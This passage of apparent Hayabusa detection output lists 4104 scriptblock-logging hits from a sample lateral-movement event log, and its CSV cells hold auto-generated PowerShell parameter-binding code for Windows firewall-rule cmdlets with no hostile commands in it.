[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 